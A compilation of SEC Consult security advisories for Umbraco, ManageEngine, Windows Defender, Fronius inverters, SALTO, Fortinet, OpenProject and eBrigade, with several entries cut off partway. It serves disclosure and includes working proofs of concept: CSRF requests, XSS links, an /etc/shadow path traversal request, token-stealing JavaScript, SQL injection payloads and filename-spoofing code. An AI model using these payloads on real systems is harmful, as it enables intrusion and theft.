SEC Consult SA-20200123-0 :: Cross-Site Request Forgery (CSRF) in Umbraco CMS
SEC Consult Vulnerability Lab Security Advisory < 20200123-0 >
===
title: Cross-Site Request Forgery (CSRF)
product: Umbraco CMS
vulnerable version: version 8.2.2
fixed version: version 8.5
CVE number: CVE-2020-7210
impact: medium
homepage: https://umbraco.com/
found: October 2019
by: A. Melnikova (Office Moscow)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"Umbraco 8 is the latest version of Umbraco CMS. It’s the fastest and best
version of Umbraco and a big step forward in regard to making your work
with Umbraco simpler; simpler to extend, simpler to edit, simpler to
publish - simpler to use, simpler to enjoy."
Source: https://umbraco.com/products/umbraco-cms/umbraco-8/
Business recommendation:
The vendor provides a patch and users of this product are urged to
immediately upgrade to the latest version available.
SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.
Vulnerability overview/description:
---
1) Cross-Site Request Forgery (CSRF)
An attacker can use cross-site request forgery to perform arbitrary web
requests with the identity of the victim, without being noticed by the
victim. This attack always requires some sort of user interaction, usually
the victim needs to click on an attacker-prepared link or visit a page
under control of the attacker. Due to this, an attacker is able to
enable/disable or delete accounts. This may lead to DoS of user accounts.
Proof of concept:
-
1) Cross-Site Request Forgery (CSRF)
In a live attack scenario, the following HTML document would be hosted
on a malicious website, controlled by the attacker.
Example 1: HTML-code for disabling user:
history.pushState('', '', '/')
Request:
POST /umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds=
HTTP/1.1
Host:
[...]
Cookie:
Response:
-
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 112
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Set-Cookie:
Date: Wed, 06 Nov 2019 10:57:45 GMT
Connection: close
)]}',
{"notifications":[{"header":" is now
disabled","message":"","type":3}],"message":" is now disabled"}
Example 2: HTML-code for enabling user:
history.pushState('', '', '/')
Request:
POST /umbraco/backoffice/UmbracoApi/Users/PostEnableUsers?userIds=
HTTP/1.1
Host:
[...]
Cookie:
Response:
-
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 110
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 06 Nov 2019 10:58:12 GMT
Connection: close
)]}',
{"notifications":[{"header":" is now
enabled","message":"","type":3}],"message":" is now enabled"}
Example 3: HTML-code for deleting user:
history.pushState('', '', '/')
Request:
POST
/umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser?id=
HTTP/1.1
Host:
[...]
Cookie:
Response:
-
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 114
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Set-Cookie:
Date: Wed, 06 Nov 2019 10:58:36 GMT
Connection: close
)]}',
{"notifications":[{"header":"User was
deleted","message":"","type":3}],"message":"User was deleted"}
As soon as an authenticated victim (admin) visits a website with this HTML code
embedded, the payload would get executed in the context of the victim's
session. Although responses to these requests are not delivered to the
attacker, in many cases it is sufficient to be able to compromise the
integrity of the victim's information stored on the site or to perform
certain, possibly compromising requests to other sites.
Vulnerable / tested versions:
-
The following version was tested and found to be vulnerable:
* version 8.2.2
Vendor contact timeline:
2019-11-13: Contacting vendor through secur...@umbraco.com.
2019-11-13: Requesting encryption keys.
SEC Consult SA-20200122-0 :: Reflected XSS in ZOHO ManageEngine ServiceDeskPlus
SEC Consult Vulnerability Lab Security Advisory < 20200122-0 >
===
title: Reflected XSS
product: ZOHO ManageEngine ServiceDeskPlus
vulnerable version: <= 11.0 Build 11007
fixed version: 11.0 Build 11010
CVE number: CVE-2020-6843
impact: medium
homepage: https://www.manageengine.com/products/service-desk/
found: 2019-12-01
by: Johannes Kruchem (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"ServiceDesk Plus is a game changer in turning IT teams from daily fire-fighting
to delivering awesome customer service. It provides great visibility and central
control in dealing with IT issues to ensure that businesses suffer no downtime.
For 10 years and running, it has been delivering smiles to millions of IT folks,
end users, and stakeholders alike."
Source: https://www.manageengine.com/products/service-desk/
Business recommendation:
The vendor published a patch for ServiceDesk Plus with service pack 11010.
It is recommended to install the patch with the included patcher. An in-depth
security analysis performed by security professionals is highly advised, as the
software may be affected from further security issues.
Vulnerability overview/description:
---
1) Reflected Cross-Site Scripting (CVE-2020-6843)
A parameter of the module called "geti18nkey" reflects unfiltered user input if
it is changed. The corresponding request is frequently sent in the background
if a pre-configured network scan was started.
Proof of concept:
-
1) Reflected Cross-Site Scripting (CVE-2020-6843)
To reproduce the issue visit this URL authenticated as administrator:
http://$IP:8080/CustomReportHandler.do?module=geti18nkey=
How the parameter was found:
1) Authenticate as administrator and add an IP range in Admin -> Networkscan.
2) Click the "play" button next to the created IP range to start the scan.
3) To check the status of a started network scan frequent requests like
"http://$IP:8080/CustomReportHandler.do?module=geti18nkey=sdp.admin.network.listview.discoverystatus.scanned=<%someUUID%>"
are sent to the server.
4) The value of the "key" parameter will be reflected if you change a single
character.
The "sdpcsrfparam" isn't needed in order to trigger the XSS.
5) XSS can thus be exploited by calling
"http://$IP:8080/CustomReportHandler.do?module=geti18nkey="
Vulnerable / tested versions:
-
The following versions have been tested which were the latest versions
available at the
time of the test:
- 10.5
- 11.0 Build 11007
Vendor contact timeline:
2019-12-05: Contacting vendor through ManageEngine Security Response Center
(MESRC)
Uploaded security advisory to bugbounty.zoho.com
2019-12-09: Vendor promised to fix the vulnerability.
2020-01-08: Reported issue has been fixed in service pack 11010.
2020-01-22: Public release of security advisory.
Solution:
-
The vendor provides an updated version which should be installed immediately.
https://www.manageengine.com/products/service-desk/download.html
The vendor also provided a link to their readme about the new release:
https://www.manageengine.com/products/service-desk/readme.html#11010
Workaround:
---
None
Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~
SEC Consult SA-20191211-0 :: File Extension Spoofing in Windows Defender Antivirus
SEC Consult Vulnerability Lab Security Advisory < 20191211-0 >
===
title: File Extension Spoofing
product: Windows Defender Antivirus
vulnerable version: 4.18.1908.7-0
fixed version: Virus Definition Update of 2019/09/30
CVE number: -
impact: High
homepage:
https://www.microsoft.com/de-at/windows/comprehensive-security
found: 2019-09-25
by: David Haintz (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"Keep your PC safe with trusted antivirus protection built-in to Windows 10.
Windows Defender Antivirus delivers comprehensive, ongoing and real-time
protection against software threats like viruses, malware and spyware across
email, apps, the cloud and the web."
Source: https://www.microsoft.com/de-at/windows/comprehensive-security
Business recommendation:
Update to the latest version of the Windows Defender Antivirus definitions.
Vulnerability overview/description:
---
The vulnerability is based on the file extension spoofing method using the RTL
unicode character to display a spoofed file extension. This method uses the LTR
unicode character, that instructs the following text to be shown in
left-to-right
order. Lets assume [LTR] is the LTR unicode character, an attacker can use this
unicode character to fool a user into believing that a file has a different
extension.
For example an attacker may name an executable file (.exe)
'spoofed-[LTR]gpj.exe',
which would be displayed as 'spoofed-exe.jpg' on an LTR-based system. The most
important
point here is to have the extension you want to be shown in reverse order,
since it will
be shown right-to-left.
Combined with the right file icon, an attacker can imitate an arbitrary file
extension.
Same goes for other extensions too, like 'xlsx' for a Microsoft Excel Sheet.
During testing
it happened that 'xlsx' was typed in the wrong order ('xslx' instead of 'xlsx'
since reverse
order) and Windows Defender Antivirus removed the test file while we tried to
execute it.
As a result, two files were created, with the exact same executable but with
different fake
extensions:
1. spoofed-[RTL]xslx.exe (displayed as 'spoofed-exe.xlsx')
2. spoofed-[RTL]xlsx.exe (displayed as 'spoofed-exe.xslx')
The second one was deleted, while the first one could be executed without any
problem.
Therefore, other extensions related to Microsoft Office were tested as well,
but it seems
only the xlsx extension had a detection for it.
While the security issue of spoofing the file extension by using the RTL
unicode character
(on RTL systems it is the same just with LTR) is widely known, it seems to be
unknown that
Microsoft already started to add detection mechanisms for this issue. But since
it is not
implemented for all extensions and it seems to be implemented in the wrong
order, this
feature is mostly unknown.
Proof of concept:
-
For the proof of concept a file has to be renamed in Unicode mode using the
Unicode
character '202E' ('\u202E' in C), which stands for RTL. The sample code is
written in
C/C++ and uses the unicode API of Windows. A Python PoC has been made as well.
C/C++:
#include
int main(int argc, char** argv)
{
wchar_t opath[] = L"test.exe";
wchar_t npath_ok[] = L"spoofed-\u202Exslx.exe"; // String for filename
'spoofed-exe.xlsx'
wchar_t npath_wrong[] = L"spoofed-\u202Exlsx.exe"; // String for
filename 'spoofed-exe.xslx'
// Copy 'test.exe' to file shown as 'spoofed-exe.xlsx'
CopyFileW(opath, npath_ok, false);
// Copy 'test.exe' to file shown as 'spoofed-exe.xslx'
CopyFileW(opath, npath_wrong, false);
}
Python:
from shutil import copyfile
opath = "test.exe"
npath_ok = "spoofed-\u202Exslx.exe" # String for filename 'spoofed-exe.xlsx'
npath_wrong = "spoofed-\u202Exlsx.exe" # String for filename 'spoofed-exe.xslx'
# Copy 'test.exe' to file shown as 'spoofed-exe.xlsx'
copyfile(opath, npath_ok)
# Copy 'test.exe' to file shown as 'spoofed-exe.xslx'
copyfile(opath, npath_wrong)
There will be two new files after the execution (as long as 'test.exe' exists)
and the file
shown as 'spoofed-exe.xslx' will be deleted while trying to execute (or
earlier) as shown
in figure 1.
[ win-defender-ext-spoofing1.png ]
Figure 1: File gets deleted by Windows Defender Antivirus.
But the file shown as 'spoofed-exe.xlsx' will be executed without any problem.
[ win-defender-ext-spo
SEC Consult SA-20191203-0 :: Multiple vulnerabilites in Fronius Solar Inverter Series
SEC Consult Vulnerability Lab Security Advisory < 20191203-0 >
===
title: Multiple vulnerabilites
product: Fronius Solar Inverter Series
vulnerable version: SW Version <3.14.1 (HM 1.12.1)
fixed version: >=3.14.1 (vuln 2: 3.12.5 - HM 1.10.5), see solution
section below
CVE number: CVE-2019-19228, CVE-2019-19229
impact: High
homepage: https://www.fronius.com
found: 2018-10-31
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"A passion for new technologies, intensive research and revolutionary solutions
have been shaping the Fronius brand since 1945. As the technology leader, we
find, develop and implement innovative methods to monitor and control energy
for welding technology, photovoltaics and battery charging. We forge new paths,
try something difficult and succeed where others have failed in achieving what
seems to be impossible. [...]"
Source: http://www.fronius.com/en/about-fronius/company-values
Business recommendation:
The vendor automatically performed a fleet update of the solar inverters in the
field
in order to patch them. Nevertheless, as not all devices could be reached
through such
an update, all remaining users are advised to install the patches provided
by the vendor immediately.
Vulnerability overview/description:
---
1) Unencrypted Communication
The whole communication is handled over HTTP. There is no possibility to
activate an HTTPS web service. This vulnerability cannot be fixed by the vendor
in the current solar inverter generation, see the workaround section below.
2) Authenticated Path Traversal (CVE-2019-19229)
A path traversal attack for authenticated users is possible. This allows getting
access to the operating system of the device and access information like
network configurations and connections to other hosts or potentially other
sensitive information.
This vulnerability has been fixed in March 2019 in version 3.12.5. (HM 1.10.5).
The web server runs with "nobody" privileges, but nearly all files on the
file system are world-readable and can be extracted. This can be seen as
another vulnerability but according to the vendor this cannot be fixed in the
current solar inverter generation.
3) Backdoor Account (CVE-2019-19228)
The web interface has a backdoor user account with the username "today".
This user account has all permissions of all other users ("service",
"admin" and "user") together.
As its name suggests, the password for the user "today" changes every day
and seems to be different to other devices with the same firmware. This
means that some device-specific strings (e.g. the public device-ID) is
mixed up every day to generate a new password.
This account is being used by Fronius support in order to access the
device upon request from the user.
The fix for this issue has been split in two parts. The "password reset"
part has been fixed in version 3.14.1 (HM 1.12.1) and the second part providing
the
support account needs an architectural rework which will be fixed in a
future version (planned for 3.15.1 (HM 1.15.1)).
The passwords for all users of the web interface are stored in plain-text.
This can be seen as another vulnerability and it has been fixed in
version 3.14.1 (HM 1.12.1).
4) Outdated and Vulnerable Software Components
Outdated and vulnerable software components were found on the device during
a quick examination. Not all of the outdated components can be fixed by the
vendor
in the current solar inverter generation, see the workaround section below.
Proof of concept:
-
1) Unencrypted Communication
By using an interceptor proxy this vulnerability can be verified in a
simple way.
2) Authenticated Path Traversal (CVE-2019-19229)
By sending the following request to the following endpoint, a path traversal
vulnerability can be triggered:
http:///admincgi-bin/service.fcgi
Request to read the "/etc/shadow" password file:
┌──
|GET
/admincgi-bin/service.fcgi?action=download=../../../../../etc/shadow
└──
As response, the file is returned without line breaks. In this example the
line breaks are added for better readability:
┌──
|HTTP/1.1 200 OK
|Content-Type: appli
SEC Consult SA-20191202-0 :: Multiple Critical Vulnerabilities in SALTO ProAccess SPACE
SEC Consult Vulnerability Lab Security Advisory < 20191202-0 >
===
title: Multiple Critical Vulnerabilities
product: SALTO ProAccess SPACE
vulnerable version: <= v5.5
fixed version: >= v5.6
CVE number: CVE-2019-19457, CVE-2019-19458, CVE-2019-19459,
CVE-2019-19460
impact: critical
homepage: https://www.saltosystems.com/en/
found: 2019-05-22
by: Werner Schober (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"SALTO ProAccess SPACE Software is a powerful access control management
tool that enables you to program access time zones for each user,
manage different calendars and obtain audit trails from each door
to see who has passed through it. The software includes special
functions such as automatic door status changes, anti-passback
and relay management.
Thanks to its advanced software features, SALTO ProAccess SPACE is also
one of the most user-friendly and powerful software products for the
access control management of stand-alone wireless devices, and IP
online devices in one converged complete access control platform
for the user, keys and doors management."
Source: http://proaccess-space.saltosystems.com/features/
Business recommendation:
The vendor provides a patch which should be installed immediately.
SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.
Vulnerability overview/description:
---
1. Path Traversal (CVE-2019-19458)
Path traversal vulnerabilities allow attackers access to files
and directories outside the application root through relative file paths
in the user input. During a quick security check, multiple locations
in the web application were identified, which allow an attacker
to traverse outside of the application root. The vulnerabilities got
identified in the "Data Export" as well as "Database Export"
functionality. Those vulnerabilities can for example be used to dump the
whole database into the web root, by traversing outside of the application
root.
2. Arbitrary File Write (CVE-2019-19459)
By further exploiting the path traversal vulnerability inside of the
"Data Export" feature, an attacker is able to traverse into arbitrary paths
and write arbitrary files with arbitrary contents. Some examples are files
to the web root, or bat files into auto start. This allows an attacker to
execute arbitrary commands on the server.
3. Stored Cross-Site-Scripting (CVE-2019-19457)
By adding devices to the SALTO network with a JavaScript payload inside of
certain parameters, an attacker is able to permanently embed arbitrary
JavaScript payloads inside of the web application.
4. Webserver running as SYSTEM (Windows Service) per Default (CVE-2019-19460)
The webserver of the SALTO ProAccess SPACE is running as a Windows Service with
local SYSTEM permissions per default. This is against the principle of least
privilege. An attacker, who is able to exploit the path traversal, or arbitrary
file write vulnerability, is basically able to write to every single path
on the file system, because the webserver is running with the highest
privileges available.
5. Authorization Issues
Multiple API calls were identified in the SALTO ProAccess SPACE web application,
that could normally only be called by high privileged users. Nevertheless, by
directly calling the API with the OAuth token of a low privileged user, it was
possible to call some API calls that shouldn't be available to them.
6. Cleartext transmission of sensitive data
The SALTO ProAccess SPACE web application allows their users to create so called
event streams. Those streams can be used to log events centrally. The stream
is transmitted via TCP/UDP in JSON, or CSV format. The stream is transmitted in
cleartext and leaks sensitive data such as who opened which door and when
including card ids etc.
Proof of concept:
-
1. Path Traversal (CVE-2019-19458)
The "Data Export" as well as the "Database Export" features in
SALTO ProAccess SPACE allow users to specify a filename for the different
exports. By using special characters inside of the filename, an attacker is
able to traverse outside of the designated export path and place the exports
in arbitrary locations. For example, the following filename can be used
in the database export to store the database backup inside of the webroot:
..\..\..\..\SALTO\ProAccess Space\bin\webapp\backup.
Re: SEC Consult SA-20191125-0 :: FortiGuard XOR Encryption in Multiple Fortinet Products
Hi, we received incorrect version information during the coordination phase thus our initial advisory stated that FortiOS v6.0.7 fixes the issue. Fortinet has just now confirmed that only v6.2.0 includes the patch. See their advisory: https://fortiguard.com/psirt/FG-IR-18-100 SEC Consult Vulnerability Lab On 25.11.19 14:43, SEC Consult Vulnerability Lab wrote: > SEC Consult Vulnerability Lab Security Advisory < 20191125-0 > > === > title: FortiGuard XOR Encryption > product: Multiple Fortinet Products (see Vulnerable / tested > versions) > vulnerable version: Multiple (see Vulnerable / tested versions) > fixed version: Multiple (see Solution) > CVE number: CVE-2018-9195 > impact: High >homepage: https://www.fortinet.com > found: 2018-05-16 > > by: Stefan Viehböck (Office Vienna) > SEC Consult Vulnerability Lab > > An integrated part of SEC Consult > Europe | Asia | North America > > https://www.sec-consult.com > > === > > Vendor description: > --- > "From the start, the Fortinet vision has been to deliver broad, truly > integrated, high-performance security across the IT infrastructure. > > We provide top-rated network and content security, as well as secure access > products that share intelligence and work together to form a cooperative > fabric. Our unique security fabric combines Security Processors, an intuitive > operating system, and applied threat intelligence to give you proven security, > exceptional performance, and better visibility and control--while providing > easier administration." > > Source: https://www.fortinet.com/corporate/about-us/about-us.html > > > Business recommendation: > > The vendor provides a patch and users of affected products are urged to > immediately upgrade to the latest version available. > > > Vulnerability overview/description: > --- > Fortinet products, including FortiGate and Forticlient regularly send > information to Fortinet servers (DNS: guard.fortinet.com) on > - UDP ports 53, and > - TCP port 80 (HTTP POST /fgdsvc) > > This cloud communication is used for the FortiGuard Web Filter feature > (https://fortiguard.com/webfilter), > FortiGuard AntiSpam feature (https://fortiguard.com/updates/antispam) > and FortiGuard AntiVirus feature (https://fortiguard.com/updates/antivirus). > > The messages are encrypted using XOR "encryption" with a static key. > > > The protocol messages contain the following types of information: > > **Serial number of the Fortinet product installation** (product type + unique > ID). > This information allows an attacker who can **passively monitor** internet > traffic to: > - learn which Fortinet products and product types an organization uses > (this is valuable for information gathering, see EquationGroup Fortigate > exploits) > - learn which FortiClient installations are part of an organization > - use the FortiClient serial number as a unique identifier to track an > individual as > he/she travels the world > > > **Full HTTP URLs of users web surfing activity** (Web Filter feature). > This information allows an attacker who can **passively monitor** internet > traffic > to spy on users' web surfing activity. In cases where SSL inspection is > enabled, > even the URLs of HTTPS-encrypted communication are sent via this protocol, > effectively breaking the confidentiality of SSL/TLS. > > > **Unspecified email data** (AntiSpam feature). > We do not have any further information on what kind of information is sent by > the > AntiSpam feature. > > > **Unspecified AntiVirus data** (AntiVirus feature). > We do not have any further information on what kind of information is sent by > the > AntiVirus feature. > > > By **intercepting and manipulating** internet traffic an attacker can: > Manipulate the responses for FortiGuard Web Filter, AntiSpam and AntiVirus > features. > > > Proof of concept: > - > The following Python 3 script decrypts a FortiGuard message (the static XOR > key > has been removed from this advisory). > > > ```python > from itertools import cycle > > def forti_xor(s1): > xor_key = **removed** > message = ''.join(chr(c ^ k) for c, k in zip(s1, cycle(xor_key))) > return message > > r1=bytes.f
SEC Consult SA-20191125-0 :: FortiGuard XOR Encryption in Multiple Fortinet Products
SEC Consult Vulnerability Lab Security Advisory < 20191125-0 >
===
title: FortiGuard XOR Encryption
product: Multiple Fortinet Products (see Vulnerable / tested
versions)
vulnerable version: Multiple (see Vulnerable / tested versions)
fixed version: Multiple (see Solution)
CVE number: CVE-2018-9195
impact: High
homepage: https://www.fortinet.com
found: 2018-05-16
by: Stefan Viehböck (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"From the start, the Fortinet vision has been to deliver broad, truly
integrated, high-performance security across the IT infrastructure.
We provide top-rated network and content security, as well as secure access
products that share intelligence and work together to form a cooperative
fabric. Our unique security fabric combines Security Processors, an intuitive
operating system, and applied threat intelligence to give you proven security,
exceptional performance, and better visibility and control--while providing
easier administration."
Source: https://www.fortinet.com/corporate/about-us/about-us.html
Business recommendation:
The vendor provides a patch and users of affected products are urged to
immediately upgrade to the latest version available.
Vulnerability overview/description:
---
Fortinet products, including FortiGate and Forticlient regularly send
information to Fortinet servers (DNS: guard.fortinet.com) on
- UDP ports 53, and
- TCP port 80 (HTTP POST /fgdsvc)
This cloud communication is used for the FortiGuard Web Filter feature
(https://fortiguard.com/webfilter),
FortiGuard AntiSpam feature (https://fortiguard.com/updates/antispam)
and FortiGuard AntiVirus feature (https://fortiguard.com/updates/antivirus).
The messages are encrypted using XOR "encryption" with a static key.
The protocol messages contain the following types of information:
**Serial number of the Fortinet product installation** (product type + unique
ID).
This information allows an attacker who can **passively monitor** internet
traffic to:
- learn which Fortinet products and product types an organization uses
(this is valuable for information gathering, see EquationGroup Fortigate
exploits)
- learn which FortiClient installations are part of an organization
- use the FortiClient serial number as a unique identifier to track an
individual as
he/she travels the world
**Full HTTP URLs of users web surfing activity** (Web Filter feature).
This information allows an attacker who can **passively monitor** internet
traffic
to spy on users' web surfing activity. In cases where SSL inspection is enabled,
even the URLs of HTTPS-encrypted communication are sent via this protocol,
effectively breaking the confidentiality of SSL/TLS.
**Unspecified email data** (AntiSpam feature).
We do not have any further information on what kind of information is sent by
the
AntiSpam feature.
**Unspecified AntiVirus data** (AntiVirus feature).
We do not have any further information on what kind of information is sent by
the
AntiVirus feature.
By **intercepting and manipulating** internet traffic an attacker can:
Manipulate the responses for FortiGuard Web Filter, AntiSpam and AntiVirus
features.
Proof of concept:
-
The following Python 3 script decrypts a FortiGuard message (the static XOR key
has been removed from this advisory).
```python
from itertools import cycle
def forti_xor(s1):
xor_key = **removed**
message = ''.join(chr(c ^ k) for c, k in zip(s1, cycle(xor_key)))
return message
r1=bytes.fromhex('6968766f606e776c2d2d21262138475c5b5a475b545e475c6b6a776b646e776c6b6a772b646e776c6b6a776b646e776c6b6a776bbadf04036b6a776c616a846f')
print(repr(forti_xor(r1)))
```
In this case the encrypted message contents are:
'\x02\x02\x01\x04\x04\x00\x00\x00FGVMEV00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00...'
Another example:
'\x02\x01\x02\x04úI\x03\x00FG100D3G\x00\x00\...x00\x00+https://v10.vortex-win.data.microsoft.com/\x00'
Vulnerable / tested versions:
-
The following FortiOS versions are affected according to the vendor:
* FortiOS 6.0.6 and below
* FortiClientWindows 6.0.6 and below
* FortiClientMac 6.2.1 and below
The security advisory of the vendor can be found at:
https://fortiguard.com/psirt/FG-IR-18-100
Vendor contact timeline:
2018-05-17: Contacting vendor through ps...@fortinet.com, sending advisory with
publi
SEC Consult SA-20191014-0 :: Reflected XSS vulnerability in OpenProject
SEC Consult Vulnerability Lab Security Advisory < 20191014-0 >
===
title: Reflected XSS vulnerability
product: OpenProject
vulnerable version: <= 9.0.3, <=10.0.1
fixed version: 9.0.4, 10.0.2
CVE number: CVE-2019-17092
impact: medium
homepage: https://www.openproject.org
found: 2019-09-27
by: David Haintz (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"OpenProject is the leading open source project management software. Support
your
project management process along the entire project life cycle: From project
initiation to closure."
Source: https://www.openproject.org/
Business recommendation:
Update to the latest version of OpenProject.
An in-depth security analysis performed by security professionals is
highly advised, as the software may be affected from further security issues.
Vulnerability overview/description:
---
1) Reflected XSS vulnerability (CVE-2019-17092)
The project list of OpenProject lacks input validation on data that is output
inside
an error message. Due to the Content Security Policy inline scripts/styles
weren't
allowed and the script source was limited to 'self'. To bypass this a
JavaScript file
was added as attachment to an existing project. This could be used to extract
the CSRF
token and create a new API key.
Proof of concept:
-
1) Reflected XSS vulnerability (CVE-2019-17092)
Within this proof of concept, two steps are done. First the JavaScript code to
be
executed is uploaded as an attachment to fulfill the Content Security Policy of
'self'. In the second step the uploaded JavaScript code is executed through the
reflected XSS vulnerability by using a script-tag.
a) Upload JavaScript code
An attacker can upload a JavaScript file as attachment into any project in the
default
configuration. The attachment can be called directly, but will be downloaded
automatically. But since the browser doesn't care if a file shall be downloaded
or
displayed when loading it from an src-property, an attacker can easily use it
for the
reflected XSS vulnerability.
In this proof of concept the following JavaScript code was uploaded:
(async () => {
var csrf_param =
document.querySelector('meta[name=csrf-param]').content;
var csrf_token =
document.querySelector('meta[name=csrf-token]').content;
var req = await fetch("http://$IP/my/generate_api_key;, {
"credentials": "include",
"headers": {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0)
Gecko/20100101 Firefox/68.0",
"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "de,en-US;q=0.7,en;q=0.3",
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1"
},
"referrer": "http://$IP/my/access_token;,
"body": "_method=post&" + csrf_param + "=" + encodeURI(csrf_token),
"method": "POST",
"mode": "cors"
});
var resp = await req.text();
var regex = /(Your access token is:\\)(.*)(\<\/strong\>)/gm;
var api_key = resp.match(regex)[0];
api_key = api_key.slice(35, -9);
alert("Generated new API key: " + api_key);
})();
This gets the CSRF token and the parameter name (since this seems to be
configurable)
and sends a request to the generate_api_key functionality. After parsing, the
key is
exposed in a message box, but can be used for further operations like adding an
administrative user.
b) Craft link
The reflected XSS vulnerability was found in the URL parameter 'sortBy' of the
path
'/projects'. There an attacker may add any HTML code.
Such a link could be:
http://$IP/projects?sortBy=[[%22%3E%3Cscript%20src=%27/attachments/29/test.js%27%3E%3C%2Fscript%3E%22%2C%22%22]]
Vulnerable / tested versions:
-
The following version has been tested which was the latest version available at
the
time of the test:
* 10.0.0
* 10.0.1
According to the vendor, all versions before v9.0.3 and v10.0.1 are affected.
Vendor contact timeline:
2019-10-02: Contacting vendor through secur...@openproject.com
2019-10-02: Vendor verified the vulnerabili
SEC Consult SA-20190926-0 :: Multiple SQL Injection vulnerabilities in eBrigade
SEC Consult Vulnerability Lab Security Advisory < 20190926-0 >
===
title: Multiple SQL Injection vulnerabilities
product: eBrigade
vulnerable version: <5.0
fixed version: >=5.0
CVE number: CVE-2019-16743, CVE-2019-16744, CVE-2019-16745
impact: critical
homepage: https://ebrigade.net
found: 2019-06-06
by: D. Haintz (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"eBrigade is a web application that allows the management of personnel, vehicles
and equipment of rescue centers (fire brigades), associations of first
responders and military organizations. Highly configurable, eBrigade can meet
the expectations of many other organizations. Skills management, generation of
the cover sheet according to availability. Management of the interventions and
the victims with assessment sheets rescuers. Private social network.
Notifications and alerts by email and SMS. Accounting, reporting and numerous
graphs allow precise monitoring of the organization." (translated)
Source: https://ebrigade.net/
Business recommendation:
The vendor provides a patch and users of this product are urged to immediately
upgrade to the latest version available.
An in-depth security analysis performed by security professionals is
highly advised, as the software may be affected from further security
issues.
Vulnerability overview/description:
---
1) Multiple SQL Injection vulnerabilities
Due to insufficient sanitization of user input an authenticated attacker can
execute arbitrary SQL code in several SELECT statements. Since two of the three
vulnerabilities are completely unsanitized and responsible to serve ICAL files,
an attacker can let a user download manipulated calendar files. Besides that an
attacker can also dump the whole database.
The third vulnerability results out of wrong usage of sanitization functions.
This enables an attacker to manipulate the SQL query with specially crafted
requests resulting into a blind SQL injection, as described in one of the
following vulnerabilities.
a) & b) Multiple UNION SQL Injections (CVE-2019-16743, CVE-2019-16744)
The parameters of two links can be manipulated so any arbitrary query to any
table or database can be added to the output of the resulting calendar files
using the UNION functionality of SQL.
c) Boolean-based Blind SQL Injection (CVE-2019-16745)
The parameters of a search result can be manipulated to guess the returned
values of an arbitrary query.
Proof of concept:
-
1) Multiple SQL Injection vulnerabilities
All vulnerabilities were tested with an authenticated user with the lowest
access rights (public). The whole PoC script requires an authenticated user for
any
functionality.
The user is authenticated by a PHP session using the cookie PHPSESSID (may
vary at different webservers). In conclusion, every request described below
requires the PHP session cookie.
a) UNION SQL Injection in evenement_ical.php (CVE-2019-16743)
The script evenement_ical.php uses the unsanitized parameter "evenement" to
query the database. The results are written into a downloadable calendar file.
By adding a UNION statement, an attacker can extend the output with arbitrary
data of the database:
The user input is read on line 42:
$evenement=(isset($_GET['evenement'])?$_GET['evenement']:"");
On line 88-89 it is added to the SQL statement:
if ($evenement !="")
$sql .= "\n and e.e_code = $evenement ";
Which is executed and fetched in line 136 and 138:
$res = mysqli_query($dbc,$sql);
while($row=mysqli_fetch_array($res)){
Since e_code is of type integer, the proper sanitization method would be
intval().
POC URL:
evenement_ical.php?evenement=1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14--
-> Version after 'LOCATION:'
POC in Python:
import requests
import string
import re
url = input("URL without file (i.e. https://localhost/ebrigade): ")
phpsession = input("PHPSESSID: ")
cookies = {'PHPSESSID': phpsession}
payload = '+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14--'
print("Testing vulnerability")
r = requests.get('{0}/evenement_ical.php?evenement=1{1}'.format(url, payload),
cookies=cookies)
